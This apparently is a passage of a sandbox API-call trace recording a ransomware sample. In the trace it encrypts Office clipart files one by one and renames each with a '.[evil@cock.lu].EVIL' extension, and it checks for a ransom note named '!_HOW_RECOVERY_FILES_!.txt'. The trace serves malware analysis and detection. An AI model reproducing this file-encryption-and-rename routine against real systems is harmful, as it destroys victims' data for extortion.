[0169.087] ??_V@YAXPEAX@Z () returned 0x1 [0169.089] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00390_.WMF", dwFileAttributes=0x200) returned 0 [0169.090] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.090] wcsstr (_Str="SO00391_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.090] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00391_.WMF") returned 69 [0169.090] wcscmp (_String1="SO00391_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.090] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00391_.WMF") returned 0x0 [0169.090] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00391_.WMF") returned 0x45 [0169.090] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00391_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00391_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.092] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x828, lpOverlapped=0x0) returned 1 [0169.099] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.099] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.099] _errno () returned 0x84b1160840 [0169.099] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.099] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x840, lpOverlapped=0x0) returned 1 [0169.099] CloseHandle (hObject=0x1a8) returned 1 [0169.099] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00391_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.099] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.099] __uncaught_exception () returned 0x84b1160800 [0169.099] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.099] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00391_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00391_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00391_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00391_.wmf.[evil@cock.lu].evil")) returned 1 [0169.100] ??_V@YAXPEAX@Z () returned 0x1 [0169.103] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00391_.WMF", dwFileAttributes=0x200) returned 0 [0169.103] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.103] wcsstr (_Str="SO00416_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.103] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00416_.WMF") returned 69 [0169.103] wcscmp (_String1="SO00416_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.103] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00416_.WMF") returned 0x0 [0169.103] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00416_.WMF") returned 0x45 [0169.103] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00416_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00416_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.106] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x704e, lpOverlapped=0x0) returned 1 [0169.113] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.113] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.113] _errno () returned 0x84b1160840 [0169.113] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.113] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x7060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7060, lpOverlapped=0x0) returned 1 [0169.113] CloseHandle (hObject=0x1a8) returned 1 [0169.113] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00416_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.113] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.113] __uncaught_exception () returned 0x84b1160800 [0169.113] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.113] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00416_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00416_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00416_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00416_.wmf.[evil@cock.lu].evil")) returned 1 [0169.115] ??_V@YAXPEAX@Z () returned 0x1 [0169.117] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00416_.WMF", dwFileAttributes=0x200) returned 0 [0169.117] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.117] wcsstr (_Str="SO00423_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.117] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00423_.WMF") returned 69 [0169.117] wcscmp (_String1="SO00423_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.117] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00423_.WMF") returned 0x0 [0169.117] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00423_.WMF") returned 0x45 [0169.117] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00423_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00423_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.119] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x143c, lpOverlapped=0x0) returned 1 [0169.126] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.126] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.126] _errno () returned 0x84b1160840 [0169.126] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.126] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1440, lpOverlapped=0x0) returned 1 [0169.126] CloseHandle (hObject=0x1a8) returned 1 [0169.127] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00423_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.127] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.127] __uncaught_exception () returned 0x84b1160800 [0169.127] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.127] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00423_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00423_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00423_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00423_.wmf.[evil@cock.lu].evil")) returned 1 [0169.128] ??_V@YAXPEAX@Z () returned 0x1 [0169.131] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00423_.WMF", dwFileAttributes=0x200) returned 0 [0169.131] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.131] wcsstr (_Str="SO00444_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.131] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00444_.WMF") returned 69 [0169.131] wcscmp (_String1="SO00444_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.131] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00444_.WMF") returned 0x0 [0169.131] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00444_.WMF") returned 0x45 [0169.131] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.133] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1544, lpOverlapped=0x0) returned 1 [0169.140] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.140] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.140] _errno () returned 0x84b1160840 [0169.140] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.140] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1560, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1560, lpOverlapped=0x0) returned 1 [0169.140] CloseHandle (hObject=0x1a8) returned 1 [0169.140] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00444_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.140] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.140] __uncaught_exception () returned 0x84b1160800 [0169.141] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.141] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00444_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00444_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00444_.wmf.[evil@cock.lu].evil")) returned 1 [0169.142] ??_V@YAXPEAX@Z () returned 0x1 [0169.144] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00444_.WMF", dwFileAttributes=0x200) returned 0 [0169.144] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.144] wcsstr (_Str="SO00452_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.144] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00452_.WMF") returned 69 [0169.144] wcscmp (_String1="SO00452_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.144] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00452_.WMF") returned 0x0 [0169.144] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00452_.WMF") returned 0x45 [0169.145] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00452_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00452_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.147] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x878, lpOverlapped=0x0) returned 1 [0169.153] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.153] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.153] _errno () returned 0x84b1160840 [0169.153] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.153] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x880, lpOverlapped=0x0) returned 1 [0169.153] CloseHandle (hObject=0x1a8) returned 1 [0169.153] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00452_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.154] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.154] __uncaught_exception () returned 0x84b1160800 [0169.154] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.154] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00452_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00452_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00452_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00452_.wmf.[evil@cock.lu].evil")) returned 1 [0169.155] ??_V@YAXPEAX@Z () returned 0x1 [0169.157] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00452_.WMF", dwFileAttributes=0x200) returned 0 [0169.158] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.158] wcsstr (_Str="SO00453_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.158] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00453_.WMF") returned 69 [0169.158] wcscmp (_String1="SO00453_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.158] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00453_.WMF") returned 0x0 [0169.158] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00453_.WMF") returned 0x45 [0169.158] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.160] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x59ec, lpOverlapped=0x0) returned 1 [0169.167] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.167] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.167] _errno () returned 0x84b1160840 [0169.167] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.167] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x5a00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5a00, lpOverlapped=0x0) returned 1 [0169.167] CloseHandle (hObject=0x1a8) returned 1 [0169.167] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00453_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.167] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.167] __uncaught_exception () returned 0x84b1160800 [0169.167] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.167] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00453_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00453_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00453_.wmf.[evil@cock.lu].evil")) returned 1 [0169.169] ??_V@YAXPEAX@Z () returned 0x1 [0169.172] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00453_.WMF", dwFileAttributes=0x200) returned 0 [0169.172] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.172] wcsstr (_Str="SO00454_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.172] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00454_.WMF") returned 69 [0169.172] wcscmp (_String1="SO00454_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.172] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00454_.WMF") returned 0x0 [0169.172] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00454_.WMF") returned 0x45 [0169.172] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00454_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00454_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.174] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb6c, lpOverlapped=0x0) returned 1 [0169.181] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.181] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.181] _errno () returned 0x84b1160840 [0169.181] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.181] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb80, lpOverlapped=0x0) returned 1 [0169.181] CloseHandle (hObject=0x1a8) returned 1 [0169.182] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00454_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.182] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.182] __uncaught_exception () returned 0x84b1160800 [0169.182] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.182] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00454_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00454_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00454_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00454_.wmf.[evil@cock.lu].evil")) returned 1 [0169.183] ??_V@YAXPEAX@Z () returned 0x1 [0169.186] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00454_.WMF", dwFileAttributes=0x200) returned 0 [0169.186] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.186] wcsstr (_Str="SO00466_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.186] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00466_.WMF") returned 69 [0169.186] wcscmp (_String1="SO00466_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.186] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00466_.WMF") returned 0x0 [0169.186] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00466_.WMF") returned 0x45 [0169.186] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00466_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00466_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.188] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xac8, lpOverlapped=0x0) returned 1 [0169.194] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.194] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.195] _errno () returned 0x84b1160840 [0169.195] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.195] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xae0, lpOverlapped=0x0) returned 1 [0169.195] CloseHandle (hObject=0x1a8) returned 1 [0169.195] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00466_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.195] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.195] __uncaught_exception () returned 0x84b1160800 [0169.195] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.195] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00466_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00466_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00466_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00466_.wmf.[evil@cock.lu].evil")) returned 1 [0169.196] ??_V@YAXPEAX@Z () returned 0x1 [0169.199] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00466_.WMF", dwFileAttributes=0x200) returned 0 [0169.199] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.199] wcsstr (_Str="SO00476_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.199] _snwprintf (in: _Dest=0x84b0fddc50, 